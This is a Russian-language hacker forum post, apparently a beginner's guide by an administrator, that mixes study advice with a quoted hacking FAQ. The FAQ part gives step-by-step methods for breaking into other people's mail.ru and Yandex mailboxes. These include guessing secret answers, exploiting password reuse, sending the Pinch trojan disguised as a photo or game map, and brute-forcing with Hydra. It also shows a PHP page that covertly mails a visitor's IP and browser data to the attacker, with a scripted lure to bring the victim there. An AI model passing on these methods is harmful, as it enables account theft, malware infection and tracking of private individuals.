Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker Hacker **** ***** ***** **** ***** ****

Hacker-Forum!®

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Hacker-Forum!® » Информация☝ » Как стать Хакером? Базовые навыки хакерства.

Как стать Хакером? Базовые навыки хакерства.

Страница: 1

Сообщений 1 страница 3 из 3

1

  • Автор: Zodiak
  • Администратор
  • Zodiak

Как стать Хакером? Предисловие.

Этот вопрос возникает у многих ребят во время первых исследований сети, программ и алгортимов. Если ты задумался о том, как стать Хакером, и это серьезно, разреши пожать тебе руку - твой исследовательский подход вызывает уважение!

Впервые, я задумался о том, как стать хакером, лет в 17. Уже не помню, что мне сподвигнуло вбить этот запрос в поисовую систему, но догадываюсь, что мои помыслы были не самыми чистыми... С тех пор прошло много лет, я изменился, изменились и мои стремления. Сейчас я увлекаюсь программированием, и создаю серьезные веб-проекты. Команда, благодаря которой был создан этот сайт, развалилась... Да и сама концепция сайта претерпела изменения. Подробней об этом можешь почитать на странице "О проекте". Но мы отвлеклись от вопроса "Как стать хакером?".

На тему хакерства уже создано не мало различных руководств, и я не вижу особого смысла все их переделывать. В задачу этой статьи входит систематизировать данные из многих источников, и составить на их основе одно большое руководство. В итоге, читая его, ты сможешь лучше понять - в какую сторону двигаться, чтобы достичь своей цели - стать Хакером.

Мне лишь остается пожелать тебе крепкого коннекта на твоем большом и интересном пути.

Основные навыки хакера

1. Изучай программирование.

Без этого навыка очень трудно стать хакером. И если тебе кажется, что программирование это очень сложно - не правда. Базовые нвыки программирования можно получить самостоятельно за несколько упорных дней, проведенных перед монитором, в изучении соответствующих статей. Лично меня никто никогда не учил программированию, просто в 17 лет я почувствовал стремление к написанию собственных программ. И учился самостоятельно, проводя ночи в изучении книг и чтении статей. С тех пор я перестал тратить время на компьютерные игры, и компьютер стал моим рабочим местом.

Именно рабочим. Весь мой заработок идет из Интернета. Вспоминая, сколько дней я убил на игры, мне становится жалко потерянного времени.

2. Приручи Интернет

Может быть, ты виртуозно владеешь Сетью, общаешься в социалках, и имеешь свой сервер CS с друзьями. Но это все фигня... Ты должен понимать, как устроен Интернет, разбираться во взаимодействии сервера и браузера, знать значение заголовков (HTTP) передаваемых серверу клиентом. Без этих знаний ответ на вопрос как стать хакером не найти.

Изучи историю Интернет, освой базовые понятия, научись понимать, что такое IP, Proxy. Это важно, правда.

3. Освой язык Гипертекстовой разметки.

Это самое первое, что ты должен сделать. Я говорю про HTML в связке с CSS. Может быть ты и делал сайты на ucoz либо на narod.ru используя стандартные шаблоны, но назвать это сайто строением нельзя ни в коем случае.

Сам HTML тебе понадобится не только для того, чтобы создавать собственные сайты, но и для того, чтобы взаимодействовать с сервером, и обращаться к php скриптам, не смущаясь от строк вида:

input autocomplete="off" class=lst type=text name=q maxlength=2048 value="как стать хакером"

4. Не задавай глупых вопросов

Я про хакерские форумы и сайты, а также про сервисы типа "Вопрос-Ответ" от Гугла. В Интернете полно информации, и ты в силах многое изучить самостоятельно.

Если же наступил момент, когда действительно нужна помощь, запомни несколько правил:

- будь вежлив. Ты просишь помощи у более опытных людей, и никто ничего тебе не обязан.

- раскрой вопрос. Выложи результаты своих поисков, и то, чего ты добился, чтобы люди поняли, что ты уже совершал самостоятельные попытки в поисках ответа на свой вопрос.

- напиши правильное решение. Если ты самостоятельно нашел ответ на свой вопрос, не нужно писать что-то типа: "Всем спасибо, проблема решена, сам справился." Помни, что твою ветку форума будут находить через поиск люди, которые еще не нашли ответа на этот вопрос. Подумай об этом, когда закрываешь тему - выкладывай правильное решение.

5. Изучай английский.

Английский язык - общепринят в Интернет. И пусть мы обзавелись собственным доменом типа .рф, но от инглиша никуда не уйти.

Для всех мировых сервисов, английский язык - это стандарт. И чем раньше ты начнешь его изучать, тем лучше для тебя.

6. Помогай новичкам.

Пускай ты пока и не так много знаешь, но не нужно скрывать информацию от других ребят, знания которых на уровне, много меньшем чем у тебя. Представь, что все на свете скрывали бы необходимую информацию, многому ли тогда ты бы научился?

Это касается и твоих будущих программ.. Не скрывай исходные коды от других. Пиши Open Source приложения, ведь это двигатель прогресса.

7. Освой базовые навыки взлома

Но перед этим немного морали: Кодекс Хакера.

Затем, можешь изучить Технологию XSS атак. Но тебе уже понадобятся знания HTML и немного PHP.

Изучи, как нужно скрывать следы после взлома. В первую очередь. Для начала можешь прочитать статью про Анонимность в сети. Если интересно, можешь почитать, как нестандартными способома украсть ICQ: Атака на ICQ

Далее преведен текст из одного известного HACK-F.A.Q.

Я ничего не знаю, но хочу стать хакером. С чего начать?

Поверь, хочешь жить спокойно, лучше не начинать…

Но я все-таки очень хочу, что же делать?

Ну что ж, тогда стоит начать с того, чтобы не задавать этот вопрос в форуме.

Сперва определимся, кто такой хакер: это существо, у которого есть компьютер (ну это обязательно), две руки (одна для мышки, другая, конечно же, для пива), голова (для наушников), и холодильник (ну пиво же не теплым пить!). Если у тебя все это есть, значит у тебя есть все шансы стать настоящим хакером ;) Ах, да, чуть не забыл, еще у хакера должен быть нестандартный образ мышления!

Зачем хакеру нестандартный образ мышления?

Все очень просто. Хакер на «ты» с компьютером и с Интернетом, а значит, не нуждается ни в чьей помощи – всю информацию он умеет находить в поисковых ресурсах. Если ты усвоишь эту простую истину, то сможешь быстро добиться успехов. Поверь, базы yandex.ru и google.ru содержат ответы на 90% вопросов, так что если не хочешь ждать несколько дней ответа, используй это преимущество. В этом и есть их «маленький секрет»; откуда они так много знают. И вообще не бойся быть оригинальным!

Эх.. а я такой ламер, что даже поисковиками пользоваться не умею.

Стоп. Ламер – только тот, кто ничего не делает. Помнишь про 90%? Никогда не забывай эту цифру. Заходим на yandex.ru, вводим запрос «Поиск информации с помощью поисковиков» и вуаля – попадаем на страницу http://www.poiskinfo.net/stat/st1.php, где все подробно описано, как искать и где. Читай, и через 15 минут будешь специалистом по поиску в сети. :)

Но если все можно найти, зачем же тогда форум?

Во-первых, форум - это сообщество, люди, объединенные общими интересами. Они обсуждают все, начиная от погоды, и заканчивая интересными взломами, но это не значит, что они с радостью будут разбираться с твоей проблемой.

Во-вторых, вспомни еще разок про 90%. Остается 10% вопросов, ответов на которые действительно пока нет в поисковиках, либо они так хорошо запрятаны, что ни за что не отыскать. Что ж, тогда у тебя есть все шансы задать свой вопрос первым. Раз он еще не встречался, скорей всего, твои потомки, столкнувшиеся с такой же проблемой, будут попадать именно на твою тему. Поэтому постарайся задать его правильно.

Как же спросить правильно?

Замечательная статья про то, как задавать вопросы: ln.com.ua/~openxs/articles/smart-questions-ru.html. Постарайся прочитать хотя бы ключевые моменты, это сильно повысит шанс, что тебе ответят и помогут.

Блин, а я вот спросил на форуме, но мне не ответили даже через неделю. Да они там сами ничего не знают!!!

Значит, ты так и не прочитал эту замечательную статью: ln.com.ua/~openxs/articles/smart-questions-ru.html. Потрать 10-15 минут, чтобы потом не терять дни… Поверь, оно стоит того.

Если же у тебя не получается даже это, давай не будем становиться хакерами, ок? :)

Какие самые популярные сайты по взлому?

Вот некоторые из них:
securitylab.ru
antichat.ru
web-hack.ru
hackzona.ru
XakNet.ru
xakep.ru
void.ru
security.nnov.ru
anonymous.ru
inattack.ru
emanual.ru
sources.ru
codenet.ru

В сети действительно много информации для новичков, но там столько терминов! Что такое сплойт, прокси, IP, дефейс и т.п.?

Во-первых, многие непонятные слова можно узнать тут: http://www.xakep.ru/magazine/xa/049/024/1.asp.

Кроме того, есть один универсальный способ: Открываем yandex.ru, и пишем там, например, «что такое прокси». Кстати, ты сможешь познакомиться с зачатками искусственного интеллекта этого поисковика, увидев, как он преобразует твой запрос в «прокси – это…». Поэтому не стесняйся задавать ему вопросы типа «что такое …», он все знает. Пусть это будет наш секрет :)

Какими необходимыми знаниями нужно обладать, чтобы стать хакером?

Во-первых, нужно здорово разбираться хотя бы в одной из операционных систем, Windows, либо *nix. Знать хотя бы основные shell-команды, причем как Windows, так и *nix

Очень желательно знание одного из интерпретируемых языков, лучше всего PHP или perl.

Без знаний HTML, javascript, CSS придется очень туго.

Весьма пригодится умение писать Windows-программки. Соответственно, это C/C++, Delphi или Visual Basic.

Умение быстро находить интересующую тебя информацию в поисковиках будет несомненным плюсом. Знание принципов функционирования компьютера, сетей и Интернета в целом. Конечно, все это не охватить сразу, начни с чего-нибудь одного и осваивай постепенно. Со временем поймешь сам, что пригодится, а что нет

Я слышал, что все хакеры не пользуются Windows это правда?

Не совсем. Дело в том, что большинство серверов - это unix системы. Именно поэтому чем лучше ты будешь знать никсы, тем больше тебе будет «везти» во взломах. А самый лучший способ узнать систему – поставить ее себе на комп. Кроме того, Unix очень привлекателен эффективной работой с сетью. Некоторые технологии, успешно реализованные в никсах, Windows даже не поддерживает, в то время, как отдельные программы вроде Corel Draw пока не имеют аналогов в *nix. Так что в какой ОС работать, это, в принципе, кому как удобней. Если есть желание познакомиться с каким-нибудь никсом, но не хочешь расставаться с Windows, то можешь оставить ее и поставить Linux как дополнительную ОС. Если заинтересовался, тебе прямая дорога на http://www.cnews.ru/reviews/articles/in … /30/188154

Как взломать мыло на mail.ru и yandex.ru?

Наверное, я тебя разочарую, но почту mail.ru, или на yandex.ru взломать нельзя. Почему?

http://mail.ru, пожалуй, самая популярная почтовая система. Администрация серверов mail.ru имеет огромные доходы с рекламы, они завлекают пользователей рекламой в печатных изданиях и по телевидению, неужели ты думаешь, они пожалеют денег на хороших специалистов по безопасности? Забудь об этом. И, самое главное, никогда не ведись на предложения «взломать любое мыло на mail.ru за $5» - тебя самым наглым образом кинут. Способов дурачить лохов куча. Самый распространенный – «найден секретный почтовый робот, сообщающий пароль от любого ящика, если прислать ему свой пароль», также предлагают различные проги для взлома ящика «100% работающие и всего за $25».

Однако стоп, не все так печально. Что? Я сказал, почту на mail.ru нельзя взломать? Я пошутил :)

Если нельзя найти баг в самом сервере, почему бы не найти его в голове владельца ящика? Итак, внимание, самые распространенные способы взлома почты на mail.ru. Само собой, они катят и для других почтовиков.

Что ж, приступим:

1. Первым делом стоит попробовать подобрать ответ на секретный вопрос. Вероятность мала, но попробовать стоит. К примеру, ответом на "любимое блюдо" чаще всего бывают "шашлык", или "пельмени".

2. Допустим, мыло vasya-pupkin@mail.ru. Ищешь в поисковиках (достаточно Яндекс, Гугл и Рамблер) все сайты, где он засветился, выписываешь все ники, под которыми он гуляет по сети и все сайты, на которых он зарегистрирован под этими никами. Конечно, если логин типа alex, то ничего не выйдет, нужен уникальный

После этого исследуешь все найденные сайты. Если человек давно существует в сети, более чем вероятно, что год-другой назад он зарегился со своим паролем на каком-нибудь superforum2.h14.ru, взломать который не составит большого труда. Пароль от аккаунта на форуме часто совпадает с паролем от мыла.

3. Отсылаем человеку троянца в надежде, что он ламер ушастый и клюнет на superFoto.jpg.............exe. Отослать можно запароленный архив csmaps.zip от имени его друга, сказав, что там новая крутая карта CS. Пароль указать в письме. Как правило, юзеры проверяют запароленный архив антивирем, а потом без палева открывают его и запускают exe-шник . Для этих целей вполне подойдет троян Pinch.

4. Допустим, ничего не помогло. Человек следит за мылом, меняет пароли и т.д.

Не все потеряно. Снова идем на страницу вспоминания пароля mail.ru и ищем, нет ли там ретрива пасса на мыло. Есть? Тогда можно попытаться узнать второе мыло и повторить всю процедурку с начала. Возможно, его человек охраняет не так ревностно.

Как взломать мыло на менее защищенных почтовиках: newmail, hotmail…?

1. Приятней всего найти багу самому: например, уязвимость в веб-интерфейсе: возможно, где-нибудь спряталась XSS, или даже SQL-inj.

2. Если админы до сих пор не почесались сделать защиту от брута, можно попытаться сбрутить пароль. Для этого есть тулзы, например, старый добрый Brutus AET под Windows, либо THC-Hydra под никсы.

3. Использовать методы соц-инженерии, описанные для mail.ru

Как взломать сервер ***? Вы же можете помочь?

Каждый взлом – процесс творческий. И каждый ломает так, как ему нравится. Но, в первую очередь, конечно, стоит досконально изучить «подопытный» сервер. Какая на нем стоит система, какие сервисы, следит ли админ за патчами и обновлениями и т.д. При достаточном опыте хакер может узнать все это имея лишь броузер и telnet-клиент, начинающему же проще всего воспользоваться сканером уязвимостей. Например, SSS-сканером под Windows, или nmap под *nix.

Сканер нашел уязвимость и радостно сообщил об этом? Не торопись мчаться на форум с вопросом «nmap выдал мне ***, что с этим делать» - тебя скорей всего пошлют. Вбей ключевые слова из фразы об уязвимости в поисковик (лучше google) – я почти уверен, что ты не первый, кто собирался задавать такой вопрос! А там, где есть вопрос, там есть и ответ :)

Если же на сервере стоит старая бажная версия одного из сервисов, пробуй найти под нее сплойты. Они чаще всего имеются на таких сайтах как securitylab.ru.

Например, сканер выдал, что на 21 порту висит демон FTP ProFTPD 1.2.7. Открываем http://securitylab.ru, вводим в поиск ProFTPD и попадаем на эту страницу: http://www.securitylab.ru/poc/221962.ph … id=242509. Как видишь, тут же можно скачать эксплойт, который даст тебе рута, а это, как ты понимаешь, очень хорошо :)

Как пользоваться сплойтами?

Очень просто. Запустить сплойт с нужными параметрами, а он все сделает за тебя. Проблема в том, что большинство сплойтов в открытом доступе только в исходниках, то есть, обычный *.txt-файл с кодом на C++ или perl. Если это C++, то сплойт придется предварительно скомпилировать. Сплойты на perl или php компилировать не надо, они исполняются прямо на сервере. Если у тебя есть shell, достаточно залить туда файл и запустить. Если ничего кроме твоей родной Windows у тебя нет, придется скачать и установить один из эмуляторов. Например, cygwin и activePerl. Можно, в принципе, воспользоваться денвером (denwer.ru), но тогда тебе, скорей всего, придется вручную добавить некоторые сетевые библиотеки, которые отсутствуют в конфигурации по умолчанию.

Помни, что большинство сплойтов в исходниках имеют «защиту от дурака», то есть специально сделанные синтаксические ошибки, поэтому если в программировании ты абсолютный ноль, придется искать уже исправленный рабочий сплойт.

Как взломать сайт?

Может быть, ты будешь расстроен, но нет ни чудо-проги lomalka_saitov.exe, ни заклинания «сайт взломайся», ни слова, которое нужно ввести на сайте, чтобы он взломался.

Опыт, знания, и упорство – вот три кита, на которых держатся самые успешные взломы. Почитай описания уже совершенных взломов, которых в сети просто до кучи, там все подробно описывается. Прочти 5-10 таких описаний, и получишь представление о том, как взломать сайт. Хотя бы примерно ;)

Могу лишь дать несколько рекомендаций:

- Очень важно, на каком сервере находится сайт-цель. Возможно, админ не следит за сервером и вовремя не патчит систему. Тебе надо быть в курсе всех последних уязвимостей, чтобы сразу это заметить. Узнать информацию о сервере можно, например, на wwwwhois-service.ru.

- Если это сервер крупной хостинг-компании, вроде valuehost, будь уверен, взломать сервер не получится, и натравливать сканер в надежде найти бажный сервис приктически не имеет смысла. В этом случае разумней всего начать с поиска багов на самом сайте, возможно ошибку допустили программисты.

- Начни с поиска установленных «сторонних» скриптов: форумов, чатов, гостевых и т.п. А может быть и сам сайт – это какой-нибудь публичный веб-портал вроде php-nuke. Тогда остается лишь узнать версию скрипта и проверить, не найдена ли в нем какая уязвимость.

Неплохая статья про взлом вебсайтов: wwwhackzona.ru/hz.php?name=News&file=article&sid=2045

Какие уязвимости чаще всего встречаются на сайтах?

Основные уязвимости, это, несомненно:

1. SQL-инъекции (SQL-injection)

SQL инъекция относится к вставке метасимволов SQL в вводимые пользователем данные, что приводит к изменению запроса базе данных. Как правило, взломщики для начала определяют уязвимость сайта к такой атаке (для этого в форму, или в один из параметров url посылается знак одинарной кавычки). Последствия выполнения такой атаки на уязвимом сайте могут находиться в пределах от появления детального сообщения об ошибке, что раскрывает злоумышленнику используемую на сайте технологию, до доступа к закрытым областям сайта или выполнения на сервере произвольных команд операционной системы.

Линки по теме:
http://securitylab.ru/contest/212083.php
http://injection.rulezz.ru/

2. межсайтовый скриптинг (XSS)

Принцип работы межсайтового скриптинга основан на внедрении злонамеренного кода в HTML код страницы, что приводит к выполнению такого кода на машине жертвы, то есть броузером. Чаще всего применяется в гостевых книгах, чатах и форумах.

Также XSS представляет опасность, если произвольный код отображается на страницах с расширением shtml, т.е. сервер поддерживает технологию SSI (Server Side Includes). Это может привести к чтению или выполнению произвольных файлов на сервере.

Линки по теме:
http://www.xakep.ru//magazine/xa/063/082/1.asp
http://security.e-gloryon.com/3027306486

3. Прочие баги в головах программистов ;)

Ошибки в самом сайте, из-за которых на сайте могут появиться серьезные бреши в безопасности. Например, адрес сайта содержит что-нибудь вроде «?file=», допустим site.ru?show.php&article=../index.asp, но, само собой, это лишь один из вариантов.

Линки по теме:
http://www.xakep.ru//magazine/xs/047/042/1.asp
http://www.xakep.ru//magazine/xa/069/084/1.asp

Как узнать ip сервера, например yandex.ru?

Самый быстрый способ – набрать в командной строке «ping yandex.ru»
Ты увидишь что-нибудь вроде
64 bytes from 213.180.204.11: icmp_seq=0 ttl=41 time=60.988 ms
213.180.204.11 – это и есть ip-адрес сервера.

Как узнать ip юзера в сети?

1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.

Кроме того, на сайте wwwleader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.

2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.

3. Узнать на каких irc-каналах сидит юзер и посмотреть там

4. Если ничего не помогает, но очень хочется, не отчаивайся.

Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

<?

$message = "Date: " . date("d.m.Y H:i:s")  . "\nIP: " . $REMOTE_ADDR . "\nServer: " . gethostbyaddr($REMOTE_ADDR) . "\nHTTP_X_FORWARDED_FOR: " . $HTTP_X_FORWARDED_FOR . "\nPage: " . $SERVER_NAME . $REQUEST_URI . "\nQuery: " . $QUERY_STRING . "\nComing from: " . $HTTP_REFERER . "\nBrowser: " . $HTTP_USER_AGENT . "\nFilename: " . $SCRIPT_FILENAME;

mail("admin@mail.ru", "Requested ip", $message, "From: admin@mail.ru\nContent-Type: text/plain; charset=UTF-8", "-fadmin@mail.ru");

$fp = fopen("log.txt", "a");

fwrite($fp, str_replace("\n", "\t", $message) . "\n");

fclose($fp);

include("fil.html");

?>

Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.

Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).

Действует 100% :)

Я знаю ip компьютера/юзера, как его взломать

IP – это уникальный адрес компьютера. Так же как для рассылки корреспонденции у каждого жителя планеты должен быть уникальный домашний адрес (Страна, город, улица, дом, квартира), каждый компьютер должен иметь свой уникальный ip-адрес, чтобы другие компьютеры в сети смогли передать ему информацию.

Поэтому твой вопрос равносилен вопросу «как взломать квартиру друга, если я знаю его домашний адрес».

Надеюсь, ты понимаешь, что просто знание ip недостаточно. Подробнее про ip-адрес, можно прочитать тут: http://www.sluh.freenet.kz/p8/12.html

2

  • Автор: Zodiak
  • Администратор
  • Zodiak

3

  • Автор: Dyssa
  • Участник
  • Dyssa
Страница: 1

Вы здесь » Hacker-Forum!® » Информация☝ » Как стать Хакером? Базовые навыки хакерства.

Рейтинг форумов | Создать форум бесплатно